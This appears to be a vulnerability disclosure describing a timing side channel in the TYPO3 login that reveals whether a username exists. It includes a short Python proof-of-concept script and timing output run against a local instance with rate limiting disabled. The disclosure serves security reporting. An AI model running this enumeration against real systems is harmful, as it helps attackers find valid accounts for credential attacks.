There is a significant timing difference in the login functionality for valid and invalid usernames.
1. Attempt a Login with a valid user and an invalid user and observe the difference in the response time
Here is a small test script (alternatively we can see the response time in Burp Repeater)
import requests
url = "http://127.0.0.1/typo3/login"
valid_user = {"username": "admin", "userident": "pw", "login_status": "login"}
invalid_user = {"username": "doesnotexist", "userident": "pw", "login_status": "login"}
for _ in range(3):
r = requests.post(url, data=valid_user)
print(r.elapsed.total_seconds())
print('---')
for _ in range(3):
r = requests.post(url, data=invalid_user)
print(r.elapsed.total_seconds())
Results:
$python3 timing.py
0.800313
0.778877
0.77845
---
0.021644
0.020045
0.019803
We can see that there is a difference in response time of about 750ms. This of course depends on the hash function the password is hashed with. Note that the rate limit was disabled for this PoC.